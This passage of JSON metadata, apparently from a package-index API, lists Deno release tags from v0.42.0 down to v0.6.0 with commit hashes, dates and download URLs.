v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b55